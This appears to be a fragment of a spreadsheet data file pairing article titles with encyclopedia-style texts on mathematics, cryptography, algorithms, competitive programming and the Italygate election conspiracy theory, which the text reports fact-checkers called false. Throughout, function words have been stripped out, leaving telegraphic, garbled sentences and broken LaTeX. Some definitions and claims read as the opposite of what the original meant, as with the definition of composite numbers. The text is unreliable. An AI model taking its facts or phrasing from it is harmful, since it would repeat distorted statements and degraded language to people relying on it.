integer version newton's method root extraction.the biggest problem finding sufficient number b-smooth. given proportion numbers b-smooth decreases rapidly size number. large (say, hundred digits), difficult impossible find enough algorithm work. advantage general number field sieve need search smooth numbers order n1/d positive integer (typically rather order required here. references lenstra, lenstra, jr., manasse, pollard, factorization ninth fermat number, math. comp. (1993), 319-349. available [2]. lenstra, lenstra, (eds.) development number field sieve, lecture notes mathematics 1554, springer-verlag, york, 1993. footnotes</t>
  </si>
  <si>
    <t>Italygate</t>
  </si>
  <si>
    <t>italygate pro-trump, qanon-affiliated conspiracy theory alleges 2020 united states presidential election rigged favor biden using satellites military technology remotely switch votes donald trump biden u.s. embassy rome. conspiracy also rumored involve vatican. fact-checkers reuters today, investigated claims, described "false" "baseless". details propagation theory maria strollo zack, georgia-based lobbyist leader 501(c)4 organization nations action, said told trump conspiracy theory mar-a-lago resort december 2020. december mark meadows forwarded letter explaining italygate claims acting attorney general jeffrey rosen. letter printed letterhead usaerospace partners, company republican businesswoman michele roosevelt edwards.on january 2021, institute good governance—a firm also headed edwards—released joint statement nations action stating italian hacker named arturo d'elia confessed "using leonardo computer systems military satellites located pescara, italy" change u.s. election results. italian bureau prisons later said investigating american gained access salerno prison tried interrogate d'elia. d'elia told reporters refused speak americans, connection alleged conspiracy, saying, steal anything. didn’t pass anything anyone. created malware."according zack, operation coordinated american embassy rome, help italian general claudio graziano member board leonardo. also january media matters america reported supporters theory trying "#italydidit" trend twitter. related posts retweeted qanon promoter watkins conspiracy theorists affiliated movement.on january power blackout vatican city sparked rumor among qanon followers pope francis arrested involvement "italygate" blackout orchestrated police order cover operation. around time, photo circulated internet, purportedly showed secretary state mike pompeo arresting italian president sergio mattarella role conspiracy; picture actually taken pompeo's october 2020 visit india showed pompeo ambassador kenneth juster. role mark meadows according york times, trump's last weeks office, chief staff mark meadows tried persuade department justice investigate claims. meadows emailed rosen link youtube video claims; rosen forwarded email deputy richard donoghue, responded "pure insanity". washington post commented italygate "the craziest election fraud conspiracy" pushed trump's associates, showed "just desperate president donald trump team grab hold something anything could genuinely cast doubt election defeat". also attempts overturn 2020 united states presidential election united states house select committee january attack public hearings references</t>
  </si>
  <si>
    <t>Cocks IBE scheme</t>
  </si>
  <si>
    <t>cocks scheme identity based encryption system proposed clifford cocks 2001. security scheme based hardness quadratic residuosity problem. protocol setup chooses: public rsa-modulus {\displaystyle \textstyle n=pq} {\displaystyle \textstyle p,q,\,p\equiv q\equiv 3{\bmod {4}}} prime kept secret, message cipher space {\displaystyle \textstyle {\mathcal {m}}=\left\{-1,1\right\},{\mathcal {c}}=\mathbb _{n}} secure public hash function {\displaystyle \textstyle f:\left\{0,1\right\}^{*}\rightarrow \mathbb _{n}} extract when user {\displaystyle \textstyle wants obtain private key, contacts secure channel. derives {\displaystyle \textstyle {\displaystyle \textstyle \left({\frac {a}{n}}\right)=1} deterministic process {\displaystyle \textstyle (e.g. multiple application {\displaystyle \textstyle computes {\displaystyle \textstyle r=a^{(n+5-p-q)/8}{\pmod {n}}} (which fulfils either {\displaystyle \textstyle r^{2}=a{\pmod {n}}} {\displaystyle \textstyle r^{2}=-a{\pmod {n}}} below) transmits {\displaystyle \textstyle user. encrypt encrypt (coded {\displaystyle \textstyle {\displaystyle \textstyle {\displaystyle \textstyle m\in {\mathcal {m}}} {\displaystyle \textstyle user chooses random {\displaystyle \textstyle t_{1}} {\displaystyle \textstyle m=\left({\frac {t_{1}}{n}}\right)} chooses random {\displaystyle \textstyle t_{2}} {\displaystyle \textstyle m=\left({\frac {t_{2}}{n}}\right)} different {\displaystyle \textstyle t_{1}} computes {\displaystyle \textstyle c_{1}=t_{1}+at_{1}^{-1}{\pmod {n}}} {\displaystyle c_{2}=t_{2}-at_{2}^{-1}{\pmod {n}}} sends {\displaystyle \textstyle s=(c_{1},c_{2})} user. decrypt decrypt ciphertext {\displaystyle s=(c_{1},c_{2})} user {\displaystyle computes {\displaystyle \alpha =c_{1}+2r} {\displaystyle r^{2}=a} {\displaystyle \alpha =c_{2}+2r} otherwise, computes {\displaystyle m=\left({\frac {\alpha }{n}}\right)} .note assuming encrypting entity know whether {\displaystyle square root {\displaystyle {\displaystyle {\displaystyle case send ciphertext cases. soon information known encrypting entity, element needs sent. correctness first note since {\displaystyle \textstyle p\equiv q\equiv 3{\pmod {4}}} (i.e. {\displaystyle \left({\frac {-1}{p}}\right)=\left({\frac {-1}{q}}\right)=-1} {\displaystyle \textstyle \left({\frac {a}{n}}\right)\rightarrow \left({\frac {a}{p}}\right)=\left({\frac {a}{q}}\right)} either {\displaystyle \textstyle {\displaystyle \textstyle quadratic residue modulo {\displaystyle \textstyle therefore, {\displaystyle \textstyle square root {\displaystyle \textstyle {\displaystyle \textstyle {\displaystyle {\begin{aligned}r^{2}&amp;=\left(a^{(n+5-p-q)/8}\right)^{2}\\&amp;=\left(a^{(n+5-p-q-\phi (n))/8}\right)^{2}\\&amp;=\left(a^{(n+5-p-q-(p-1)(q-1))/8}\right)^{2}\\&amp;=\left(a^{(n+5-p-q-n+p+q-1)/8}\right)^{2}\\&amp;=\left(a^{4/8}\right)^{2}\\&amp;=\pm a\end{aligned}}} moreover, (for case {\displaystyle \textstyle quadratic residue, idea holds {\displaystyle \textstyle {\displaystyle {\begin{aligned}\left({\frac {s+2r}{n}}\right)&amp;=\left({\frac {t+at^{-1}+2r}{n}}\right)=\left({\frac {t\left(1+at^{-2}+2rt^{-1}\right)}{n}}\right)\\&amp;=\left({\frac {t\left(1+r^{2}t^{-2}+2rt^{-1}\right)}{n}}\right)=\left({\frac {t\left(1+rt^{-1}\right)^{2}}{n}}\right)\\&amp;=\left({\frac {t}{n}}\right)\left({\frac {1+rt^{-1}}{n}}\right)^{2}=\left({\frac {t}{n}}\right)(\pm 1)^{2}=\left({\frac {t}{n}}\right)\end{aligned}}} security shown breaking scheme equivalent solving quadratic residuosity problem, suspected hard. common rules choosing modulus hold: secure {\displaystyle \textstyle make choice {\displaystyle \textstyle uniform random moreover include authenticity checks {\displaystyle \textstyle (otherwise, adaptive chosen ciphertext attack mounted altering packets transmit single using oracle observe effect decrypted bit). problems major disadvantage scheme encrypt messages therefore, suitable small data packets like session key. illustrate, consider transmitted using 1024 modulus. then, send 1024 kbyte (when known whether {\displaystyle square −a), acceptable environments session keys change infrequently. this scheme preserve key-privacy, i.e. passive adversary recover meaningful information identity recipient observing ciphertext. references</t>
  </si>
  <si>
    <t>Complementary sequences</t>
  </si>
  <si>
    <t>complementary sequences biology, complementarity (molecular biology).in applied mathematics, complementary sequences (cs) pairs sequences useful property out-of-phase aperiodic autocorrelation coefficients zero. binary complementary sequences first introduced marcel golay 1949. 1961–1962 golay gave several methods constructing sequences length gave examples complementary sequences lengths 1974 turyn gave method constructing sequences length sequences lengths allows construction sequences length form 2n10k26m. later theory complementary sequences generalized authors polyphase complementary sequences, multilevel complementary sequences, arbitrary complex complementary sequences. complementary sets also considered; contain sequences. definition (a0, ..., (b0, ..., pair bipolar sequences, meaning a(k) b(k) values aperiodic autocorrelation function sequence defined {\displaystyle r_{x}(k)=\sum _{j=0}^{n-k-1}x_{j}x_{j+k}.\,} then pair sequences complementary {\displaystyle r_{a}(k)+r_{b}(k)=2n,\,} {\displaystyle r_{a}(k)+r_{b}(k)=0,\,} ..., using kronecker delta write: {\displaystyle r_{a}(k)+r_{b}(k)=2n\delta (k),\,} autocorrelation functions complementary sequences delta function, ideal autocorrelation many applications like radar pulse compression spread spectrum telecommunications. examples simplest example sequences length (+1, (+1, −1). their autocorrelation functions −1), next example (sequences length (+1, (+1, +1). their autocorrelation functions example length (+1, (+1, −1). their autocorrelation functions −1). example length given golay (+1, (+1, −1). their autocorrelation functions (10, 1,−2, (10, −1). properties complementary pairs sequences complementary sequences complementary spectra. autocorrelation function power spectra form fourier pair, complementary sequences also complementary spectra. fourier transform delta function constant, write {\displaystyle s_{a}+s_{b}=c_{s},} constant.sa defined squared magnitude fourier transform sequences. fourier transform direct sequences, zero padded sequences continuous fourier transform sequences equivalent transform ejω.cs spectra upper bounded. non-negative values write {\displaystyle s_{a}=c_{s}-s_{b}&lt;c_{s},} also {\displaystyle s_{b}&lt;c_{s}.} either sequences pair inverted (multiplied remain complementary. more generally sequences multiplied remain complementary; either sequences reversed remain complementary; either sequences delayed remain complementary; sequences interchanged remain complementary; sequences multiplied constant (real complex) remain complementary; sequences decimated time remain complementary. more precisely complementary pair (a(k), b(k)) form pair (a(nk), b(nk)) skipped samples discarded sequences complementary. alternating bits sequences inverted remain complementary. general arbitrary complex sequences sequences multiplied ejπkn/n (where constant time index) remain complementary; pair complementary sequences formed [..] denotes concatenation pair pair sequences formed {..} denotes interleaving sequences. pair sequences formed golay pair complementary pair encoded polynomials a(z) a(0) a(1)z 1)zn−1 similarly b(z). complementarity property sequences equivalent condition {\displaystyle \vert a(z)\vert ^{2}+\vert b(z)\vert ^{2}=2n\,} unit circle, form golay pair polynomials. examples include shapiro polynomials, give rise complementary sequences length power two. applications complementary sequences multislit spectrometry ultrasound measurements acoustic measurements radar pulse compression wi-fi networks, cdma wireless networks ofdm communication systems train wheel detection systems non-destructive tests (ndt) communications coded aperture masks designed using 2-dimensional generalization complementary sequences. also binary golay code (error-correcting code) gold sequences kasami sequences polyphase sequence pseudorandom binary sequences (also called maximum length sequences m-sequences) ternary golay code (error-correcting code) walsh-hadamard sequences zadoff–chu sequence references</t>
  </si>
  <si>
    <t>Iterative Viterbi decoding</t>
  </si>
  <si>
    <t>iterative viterbi decoding algorithm spots subsequence observation {o1, ..., highest average probability (i.e., probability scaled length generated given hidden markov model states. algorithm uses modified viterbi algorithm internal step. scaled probability measure first proposed john bridle. early algorithm solve problem, sliding window, proposed wilpon al., 1989, constant cost mn2/2. faster algorithm consists iteration calls viterbi algorithm, reestimating filler score convergence. algorithm basic (non-optimized) version, finding sequence smallest normalized distance subsequence input placed observation s[1..n], template t[1..m], [[distance matrix]] d[1..n,1..m] remaining elements matrices solely internal computations (int, int, int) averagesubmatchdistance(char s[0..(n+1)], char t[0..(m+1)], d[1..n,0..(m+1)]) score, subsequence start, subsequence declare t'[0] t'[m+1] s'[0] s'[n+1] random() d'[i,0] d'[i,m+1] viterbidistance(s', e/(e-b+1) return viterbidistance() procedure returns tuple i.e., viterbi score match selected entry exit points recorded using simple modification viterbi. modification applied tables, proposed antoine rozenknop, consists subtracting elements initial matrix references silaghi, "spotting subsequences matching using average observation probability criteria application keyword spotting", aaai, 2005. rozenknop, antoine, silaghi, marius; "algorithme décodage treillis selon critère coût moyen pour reconnaissance parole", taln 2001. further reading huan-bang; kohno, ryuji (2006). efficient code structure block coded modulations iterative viterbi decoding algorithm. international symposium wireless communication systems. valencia, spain: ieee. doi:10.1109/iswcs.2006.4362391. isbn 978-1-4244-0397-4. wang, wei, lei; kennedy, r.a. (january 2002). "iterative viterbi decoding, trellis shaping, multilevel structure high-rate parity-concatenated tcm". ieee transactions communications. (1): 48–55. doi:10.1109/26.975743. issn 0090-6778.</t>
  </si>
  <si>
    <t>Competitive programming</t>
  </si>
  <si>
    <t>competitive programming mind sport usually held internet local network, involving participants trying program according provided specifications. contestants referred sport programmers. competitive programming recognized supported several multinational software internet companies, google facebook.a programming competition generally involves host presenting logical mathematical problems, also known puzzles, contestants (who vary number tens several thousands), contestants required write computer programs capable solving problem. judging based mostly upon number problems solved time spent writing successful solutions, also include factors (quality output produced, execution time, memory usage, program size, etc.) history oldest contests known icpc originated 1970s, grown include countries 2011 edition. from 1990 1994, owen astrachan, vivek khera david kotz first distributed, internet-based programming contests inspired icpc.interest competitive programming grown extensively since 2000, strongly connected growth internet, facilitates holding international contests online, eliminating geographical problems. overview competitive programming write source code computer programs able solve given problems. vast majority problems appearing programming contests mathematical logical nature. typical tasks belong following categories: combinatorics, number theory, graph theory, algorithmic game theory, computational geometry, string analysis data structures. problems related constraint programming artificial intelligence also popular certain competitions. irrespective problem category, process solving problem divided broad steps: constructing efficient algorithm, implementing algorithm suitable programming language (the programming languages allowed varies contest contest). these commonly tested skills programming competitions. contests, judging done automatically host machines, commonly known judges. every solution submitted contestant judge (usually secret) test cases. normally, contest problems all-or-none marking system, meaning solution "accepted" produces satisfactory results test cases judge, rejected otherwise. however, contest problems allow partial scoring, depending number test cases passed, quality results, specified criteria. some contests require contestant submit output corresponding given input data, case judge analyze submitted output data. online judges online environments testing takes place. online judges ranklists showing users biggest number accepted solutions and/or shortest execution time particular problem. notable competitions there types competition formats: short-term long-term. each round short-term competition lasts hours. long-term competitions last days months. short-term international collegiate programming contest (icpc) oldest competitions, students universities groups persons international olympiad informatics (ioi) oldest competitions, secondary school students american computer science league (acsl) computer science competition written programming portions, middle/high school students codechef competition held 2009, three contests held every month annual competition called codechef snackdown codeforces round typically hour contest, held every week facebook hacker competition held 2011, provided sponsored facebook hackerrank multiple competitions gridwars four competitions held 2003 2004. google code competition held 2003, provided sponsored google ieeextreme programming competition annual competition ieee student members held since 2006 ieee. topcoder open (tco) algorithm competition held since 2001 topcoderin competitions, since number contestants quite large, competitions usually organized several rounds. they usually require online participation rounds except last, requires onsite participation. special exception ieeextreme, yearly 24-hour virtual programming competition. performers icpc receive gold, silver bronze medals contests, cash prizes awarded finishers. also hitting places score tables competitions attract interest recruiters software internet companies. long-term hackerrank week code icfp programming contest annual 3-day competition held since 1998 international conference functional programming topcoder marathon matches codechef long challenges held every month lasts days artificial intelligence machine learning kaggle data science machine learning competitions. codecup board game competition held annually since 2003. game rules published september final tournament held january. google challenge bi-annual competitions students 2009 2011. halite programming challenge sponsored sigma, cornell tech, google. russian open artificial intelligence programming contest. codingame hosts seasonal programming competitions. contests focusing open source technologies list incomplete online contest training resources programming community around world created maintained several internet-resources dedicated competitive programming. they offer standalone contests without minor prizes. also past archives problems popular resource training competitive programming. there several organizations host programming competitions regular basis. these include: notable participants following list consists contestants achieved significant results programming contests, extent, respective career. note list excludes people (for example mark zuckerberg) might successful career, significant results competitive programming: gennady korotkevich (tourist) petr mitrichev (petr) makoto soejima (rng_58), former admin problem writer topcoder founding member atcoder. tiancheng (acrush), time google code winner (2008 2009), co-founder pony.ai william (tmwilliamlin168), known largest competitive programming youtube channel adam d'angelo, facebook founder quora. scott (scott_wu), lunchclub. matei zaharia (matei), assistant professor stanford university founder databricks. benefits criticism participation programming contests increase student enthusiasm computer science studies. skills acquired icpc-like programming contests also improve career prospects, help pass "technical interviews", often require candidates solve complex programming algorithmic problems spot.there also criticism competitive programming, particularly professional software developers. critical point many fast-paced programming contests teach competitors programming habits code style (like unnecessary macros, lack abstraction comments, short variable names, etc.). also, offering small algorithmic puzzles relatively short solutions, programming contests like icpc necessarily teach good software engineering skills practices, real software projects typically many thousands lines code developed large teams long periods time. peter norvig stated based available data, winner programming contests correlated negatively programmer's performance google (even though contest winners higher chances getting hired). norvig later stated correlation observed small data set, could confirmed examining larger data another sentiment rather "wasting" time excessive competing solving problems known solutions, high-profile programmers rather invest time solving real-world problems. literature halim, halim, (2013). competitive programming lower bound programming contests. lulu. laaksonen, (2017). guide competitive programming (undergraduate topics computer science). cham: springer international publishing. also category:computer science competitions code golf hackathon references external links open-source project running contestscontest management system open-source tool python manage programming contest server 2012 2013.</t>
  </si>
  <si>
    <t>Zobrist hashing</t>
  </si>
  <si>
    <t>zobrist hashing (also referred zobrist keys zobrist signatures hash function construction used computer programs play abstract board games, chess implement transposition tables, special kind hash table indexed board position used avoid analyzing position once. zobrist hashing named inventor, albert lindsey zobrist. also applied method recognizing substitutional alloy configurations simulations crystalline materials. zobrist hashing first known instance generally useful underlying technique called tabulation hashing. calculation hash value zobrist hashing starts randomly generating bitstrings possible element board game, i.e. combination piece position game chess, that's pieces board positions, kings rooks still castle, pawns capture passant, treated separately colors). board configuration broken independent piece/position components, mapped random bitstrings generated earlier. final zobrist hash computed combining bitstrings using bitwise xor. example pseudocode game chess: constant indices white_pawn white_rook etc. black_king function init_zobrist(): fill table random numbers/bitstrings table array size 64×12 loop board, represented linear array loop pieces table[i][j] random_bitstring() table.black_to_move random_bitstring() function hash(board): is_black_turn(board): table.black_to_move loop board positions board[i] empty: piece board[i], listed constant indices, table[i][j] return hash value bitstrings long enough, different board positions almost certainly hash different values; however longer bitstrings require proportionally computer resources manipulate. commonly used bitstring (key) length bits. many game engines store hash values transposition table, omitting position information entirely reduce memory usage, assuming hash collisions occur, greatly influence results table zobrist hashing first known instance tabulation hashing. result 3-wise independent hash family. particular, strongly universal. example, chess, time squares time empty, contain game pieces, either black white. also, either black's turn play white's turn play. thus needs generate random bitstrings. given position, obtains zobrist hash finding pieces squares, combining relevant bitstrings together. position black move, black-to-move bitstring also included zobrist hash. updating hash value rather computing hash entire board every time, pseudocode does, hash value board incrementally updated simply xoring bitstring(s) positions changed, xoring bitstrings positions. instance, pawn chessboard square replaced rook another square, resulting position would produced xoring existing hash bitstrings for: 'pawn square' (xoring pawn square) 'rook square' (xoring rook square) 'rook source square' (xoring rook source square) 'nothing source square' (xoring nothing source square). this makes zobrist hashing efficient traversing game tree. computer technique also used superko detection. wider usage more generically, zobrist hashing applied finite sets elements chess example, elements {\displaystyle (piece,position)} tuples), long random bitstring assigned possible element. this either done random number generator smaller element spaces, hash function larger ones. this method used recognize substitutional alloy configurations monte carlo simulations order prevent wasting computational effort states already calculated. also alpha-beta pruning references</t>
  </si>
  <si>
    <t>Composite number</t>
  </si>
  <si>
    <t>composite number positive integer formed multiplying smaller positive integers. equivalently, positive integer least divisor itself. every positive integer composite, prime, unit composite numbers exactly numbers prime unit.for example, integer composite number product smaller integers likewise, integers composite numbers divided itself. composite numbers are: 100, 102, 104, 105, 106, 108, 110, 111, 112, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 128, 129, 130, 132, 133, 134, 135, 136, 138, 140, 141, 142, 143, 144, 145, 146, 147, 148, 150. (sequence a002808 oeis)every composite number written product (not necessarily distinct) primes. example, composite number written composite number written furthermore, representation unique order factors. this fact called fundamental theorem arithmetic.there several known primality tests determine whether number prime composite, without necessarily revealing factorization composite input. types classify composite numbers counting number prime factors. composite number prime factors semiprime 2-almost prime (the factors need distinct, hence squares primes included). composite number three distinct prime factors sphenic number. applications, necessary differentiate composite numbers number distinct prime factors even number distinct prime factors. latter {\displaystyle (n)=(-1)^{2x}=1} (where möbius function half total prime factors), former {\displaystyle (n)=(-1)^{2x+1}=-1.} however, prime numbers, function also returns {\displaystyle (1)=1} number repeated prime factors, {\displaystyle (n)=0} prime factors number repeated called powerful number (all perfect powers powerful numbers). none prime factors repeated, called squarefree. (all prime numbers squarefree.) example, prime factors repeated, powerful number. none prime factors repeated, squarefree. another classify composite numbers counting number divisors. composite numbers least three divisors. case squares primes, divisors {\displaystyle \{1,p,p^{2}\}} number divisors highly composite number (though first numbers composite numbers also called "rectangular numbers", name also refer pronic numbers, numbers product consecutive integers. another classify composite numbers determine whether prime factors either fixed (prime) number. such numbers called smooth numbers rough numbers, respectively. also canonical representation positive integer integer factorization sieve eratosthenes table prime factors notes references fraleigh, john (1976), first course abstract algebra (2nd ed.), reading: addison-wesley, isbn 0-201-01984-1 herstein, (1964), topics algebra, waltham: blaisdell publishing company, isbn 978-1114541016 long, calvin (1972), elementary introduction number theory (2nd ed.), lexington: heath company, lccn 77-171950 mccoy, neal (1968), introduction modern algebra, revised edition, boston: allyn bacon, lccn 68-15225 pettofrezzo, anthony byrkit, donald (1970), elements number theory, englewood cliffs: prentice hall, lccn 77-81766 external links lists composites prime factorization (first 100, 1,000, 10,000, 100,000, 1,000,000) divisor plot (patterns found large composite numbers)</t>
  </si>
  <si>
    <t>Normal basis</t>
  </si>
  <si>
    <t>mathematics, specifically algebraic theory fields, normal basis special kind basis galois extensions finite degree, characterised forming single orbit galois group. normal basis theorem states finite galois extension fields normal basis. algebraic number theory, study refined question existence normal integral basis part galois module theory. normal basis theorem {\displaystyle f\subset galois extension galois group {\displaystyle classical normal basis theorem states element {\displaystyle \beta {\displaystyle \{g(\beta ):g\in g\}} forms basis considered vector space that element {\displaystyle \alpha written uniquely {\textstyle \alpha =\sum _{g\in g}a_{g}\,g(\beta elements {\displaystyle a_{g}\in normal basis contrasts primitive element basis form {\displaystyle \{1,\beta ,\beta ^{2},\ldots ,\beta ^{n-1}\}} {\displaystyle \beta element whose minimal polynomial degree {\displaystyle n=[k:f]} group representation point view field extension {\displaystyle k/f} galois group naturally viewed representation group field automorphism represented itself. representations field viewed left modules group algebra {\displaystyle f[g]} every homomorphism left {\displaystyle f[g]} -modules {\displaystyle \phi :f[g]\rightarrow form {\displaystyle \phi (r)=r\beta {\displaystyle \beta since {\displaystyle \{1\cdot \sigma |\sigma g\}} linear basis {\displaystyle f[g]} follows easily {\displaystyle \phi bijective {\displaystyle \beta generates normal basis normal basis theorem therefore amounts statement saying {\displaystyle k/f} finite galois extension, {\displaystyle k\cong f[g]} left {\displaystyle f[g]} -module. terms representations means isomorphic regular representation. case finite fields finite fields stated follows: {\displaystyle f=\mathrm {gf} (q)=\mathbb _{q}} denote field elements, prime power, {\displaystyle k=\mathrm {gf} (q^{n})=\mathbb _{q^{n}}} denote extension field degree here galois group {\displaystyle g={\text{gal}}(k/f)=\{1,\phi ,\phi ^{2},\ldots ,\phi ^{n-1}\}} {\displaystyle \phi ^{n}=1,} cyclic group generated q-power frobenius automorphism {\displaystyle \phi (\alpha )=\alpha ^{q},} {\displaystyle \phi ^{n}=1=\mathrm {id} _{k}.} then exists element basis proof finite fields case galois group cyclic above, generated {\displaystyle \phi {\displaystyle \phi ^{n}=1,} normal basis theorem follows basic facts. first linear independence characters: multiplicative character mapping group field satisfying {\displaystyle \chi (h_{1}h_{2})=\chi (h_{1})\chi (h_{2})} distinct characters {\displaystyle \chi _{1},\chi _{2},\ldots linearly independent k-vector space mappings. apply galois group automorphisms {\displaystyle \chi _{i}=\phi ^{i}:k\to thought mappings multiplicative group {\displaystyle h=k^{\times {\displaystyle k\cong f^{n}} f-vector space, consider {\displaystyle \phi :f^{n}\to f^{n}} element matrix algebra {\displaystyle m_{n}(f);} since powers {\displaystyle 1,\phi ,\ldots ,\phi ^{n-1}} linearly independent (over fortiori minimal polynomial must degree least i.e. must {\displaystyle x^{n}-1} second basic fact classification finitely generated modules {\displaystyle f[x]} every module represented {\textstyle m\cong \bigoplus _{i=1}^{k}{\frac {f[x]}{(f_{i}(x))}}} {\displaystyle f_{i}(x)} chosen monic polynomials zero {\displaystyle f_{i+1}(x)} multiple {\displaystyle f_{i}(x)} {\displaystyle f_{k}(x)} monic polynomial smallest degree annihilating module, zero non-zero polynomial exists. first case {\textstyle \dim _{f}m=\sum _{i=1}^{k}\deg f_{i}} second case {\displaystyle \dim _{f}m=\infty case cyclic size generated {\displaystyle \phi f-algebra isomorphism {\textstyle f[g]\cong {\frac {f[x]}{(x^{n}-1)}}} corresponds {\displaystyle 1\cdot \phi every {\displaystyle f[g]} -module viewed {\displaystyle f[x]} -module multiplication multiplication {\displaystyle 1\cdot \phi case means {\displaystyle x\alpha =\phi (\alpha monic polynomial smallest degree annihilating minimal polynomial {\displaystyle \phi since finite dimensional f-space, representation possible {\displaystyle f_{k}(x)=x^{n}-1} since {\displaystyle \dim _{f}(k)=n,} {\displaystyle k=1} {\textstyle k\cong {\frac {f[x]}{(x^{n}{-}\,1)}}} {\displaystyle f[x]} -modules. (note isomorphism f-linear spaces, rings f-algebras!) this gives isomorphism {\displaystyle f[g]} -modules {\displaystyle k\cong f[g]} talked above, basis {\displaystyle \{1,x,x^{2},\ldots ,x^{n-1}\}} right side corresponds normal basis {\displaystyle \{\beta ,\phi (\beta ),\phi ^{2}(\beta ),\ldots ,\phi ^{n-1}(\beta )\}} left. note proof would also apply case cyclic kummer extension. example consider field {\displaystyle k=\mathrm {gf} (2^{3})=\mathbb _{8}} {\displaystyle f=\mathrm {gf} (2)=\mathbb _{2}} frobenius automorphism {\displaystyle \phi (\alpha )=\alpha ^{2}} proof clarifies choice normal bases terms structure representation f[g]-module). irreducible factorization means direct f[g]-modules chinese remainder theorem): first component {\displaystyle f\subset second isomorphic f[g]-module {\displaystyle \mathbb _{2^{2}}\cong \mathbb _{2}[x]/(x^{2}{+}x{+}1)} action {\displaystyle \phi \cdot x^{i}=x^{i+1}.} (thus {\displaystyle k\cong \mathbb _{2}\oplus \mathbb _{4}} f[g]-modules, f-algebras.) elements {\displaystyle \beta used normal basis precisely outside either submodules, {\displaystyle (\phi {+}1)(\beta )\neq {\displaystyle (\phi ^{2}{+}\phi {+}1)(\beta )\neq terms g-orbits correspond irreducible factors elements {\displaystyle f=\mathbb _{2}} roots {\displaystyle t(t{+}1)} nonzero elements submodule {\displaystyle \mathbb _{4}} roots {\displaystyle t^{3}+t+1} normal basis, case unique, given roots remaining factor {\displaystyle t^{3}{+}t^{2}{+}1} contrast, extension field {\displaystyle l=\mathrm {gf} (2^{4})=\mathbb _{16}} divisible f[g]-module isomorphism here operator {\displaystyle \phi \cong diagonalizable, module nested submodules given generalized eigenspaces {\displaystyle \phi normal basis elements outside largest proper generalized eigenspace, elements {\displaystyle (\phi {+}1)^{3}(\beta )\neq application cryptography normal basis frequently used cryptographic applications based discrete logarithm problem, elliptic curve cryptography, since arithmetic using normal basis typically computationally efficient using bases. example, field {\displaystyle k=\mathrm {gf} (2^{3})=\mathbb _{8}} above, represent elements bit-strings: coefficients bits {\displaystyle a_{i}\in \mathrm {gf} (2)=\{0,1\}.} square elements left circular shift, {\displaystyle \alpha ^{2}=\phi (a_{2},a_{1},a_{0})=(a_{1},a_{0},a_{2})} since squaring gives this makes normal basis especially attractive cryptosystems utilize frequent squaring. proof case infinite fields suppose {\displaystyle k/f} finite galois extension infinite field {\displaystyle [k:f]=n} {\displaystyle {\text{gal}}(k/f)=g=\{\sigma _{1}...\sigma _{n}\}} {\displaystyle \sigma _{1}={\text{id}}} primitive element theorem exists {\displaystyle \alpha {\displaystyle k=f[\alpha minimal monic polynomial {\displaystyle \alpha then irreducible monic polynomial degree {\displaystyle \alpha _{i}=\sigma _{i}\alpha since degree {\displaystyle \alpha _{i}\neq \alpha _{j}} {\displaystyle i\neq words, note {\displaystyle g(\alpha )=1} {\displaystyle g_{i}(\alpha )=0} {\displaystyle i\neq next, define {\displaystyle n\times matrix polynomials polynomial observe {\displaystyle a_{ij}(x)=g_{k}(x)} determined {\displaystyle \sigma _{k}=\sigma _{i}\cdot \sigma _{j}} particular {\displaystyle k=1} {\displaystyle \sigma _{i}=\sigma _{j}^{-1}} follows {\displaystyle a(\alpha permutation matrix corresponding permutation sends {\displaystyle \sigma _{i}} {\displaystyle \sigma _{i}^{-1}} denote {\displaystyle a(\alpha matrix obtained evaluating {\displaystyle a(x)} {\displaystyle x=\alpha therefore, {\displaystyle d(\alpha )=\det a(\alpha )=\pm non-zero polynomial, therefore finite number roots. since assumed infinite, find {\displaystyle a\in {\displaystyle d(a)\neq define claim {\displaystyle \{\beta _{1},\ldots ,\beta _{n}\}} normal basis. show {\displaystyle \beta _{1},\ldots ,\beta _{n}} linearly independent suppose {\textstyle \sum _{j=1}^{n}x_{j}\beta _{j}=0} {\displaystyle x_{1}...x_{n}\in applying automorphism {\displaystyle \sigma _{i}} yields {\textstyle \sum _{j=1}^{n}x_{j}\sigma _{i}(g_{j}(a))=0} words, {\displaystyle a(a)\cdot {\overline {x}}={\overline {0}}} since {\displaystyle \det a(a)=d(a)\neq conclude {\displaystyle {\overline {x}}={\overline {0}}} completes proof. tempting take {\displaystyle a=\alpha {\displaystyle d(\alpha )\neq impermissible used fact {\displaystyle a\in conclude f-automorphism {\displaystyle \sigma polynomial {\displaystyle h(x)} {\displaystyle value polynomial {\displaystyle \sigma (h(x))} {\displaystyle equals {\displaystyle \sigma (h(a))} primitive normal basis primitive normal basis extension finite fields normal basis generated primitive element generator multiplicative group {\displaystyle k^{\times (note restrictive definition primitive element mentioned general normal basis theorem: requires powers element produce every non-zero element merely basis.) lenstra schoof (1987) proved every finite field extension possesses primitive normal basis, case prime field settled harold davenport. free elements galois extension generates normal basis free k/f. property every subgroup galois group fixed field free k/kh, said completely free k/f. every galois extension completely free element. also dual basis field extension polynomial basis zech's logarithm references cohen, niederreiter, eds. (1996). finite fields applications. proceedings international conference, glasgow, july 11–14, 1995. london mathematical society lecture note series. vol. 233. cambridge university press. isbn 978-0-521-56736-7. 0851.00052. lenstra, h.w., schoof, r.j. (1987). "primitive normal bases finite fields". mathematics computation. (177): 217–231. doi:10.2307/2007886. jstor 2007886. 0615.12023. menezes, alfred (1993). applications finite fields. kluwer international series engineering computer science. vol. 199. boston: kluwer academic publishers. isbn 978-0792392828. 0779.11059.</t>
  </si>
  <si>
    <t>Nonlinear-feedback shift register</t>
  </si>
  <si>
    <t>nonlinear-feedback shift register (nlfsr) shift register whose input non-linear function previous state. n-bit shift register next state defined {\displaystyle r_{i+1}(b_{0},b_{1},b_{2},\ldots ,b_{n-1})=r_{i}(b_{1},b_{2},\ldots ,f(b_{0},b_{1},b_{2},\ldots ,b_{n-1}))} non-linear feedback function. applications nonlinear-feedback shift registers components modern stream ciphers, especially rfid smartcard applications. nlfsrs known resistant cryptanalytic attacks linear feedback shift registers (lfsrs). generating known generate n-bit nlfsr maximal length generating bruijn sequence, extending maximal-length lfsr stages; construction large nlfsrs guaranteed long periods remains open problem. using bruteforce methods, list maximum-period n-bit nlfsrs made well n=27.new methods suggest usage evolutionary algorithms order introduce non-linearity. works, evolutionary algorithm learns apply different operations strings lfsr enhance quality meet criteria fitness function, nist protocol, effectively. also nlfsr-based ciphers: achterbahn grain keeloq algorithm lizard trivium vest references</t>
  </si>
  <si>
    <t>Neural cryptography</t>
  </si>
  <si>
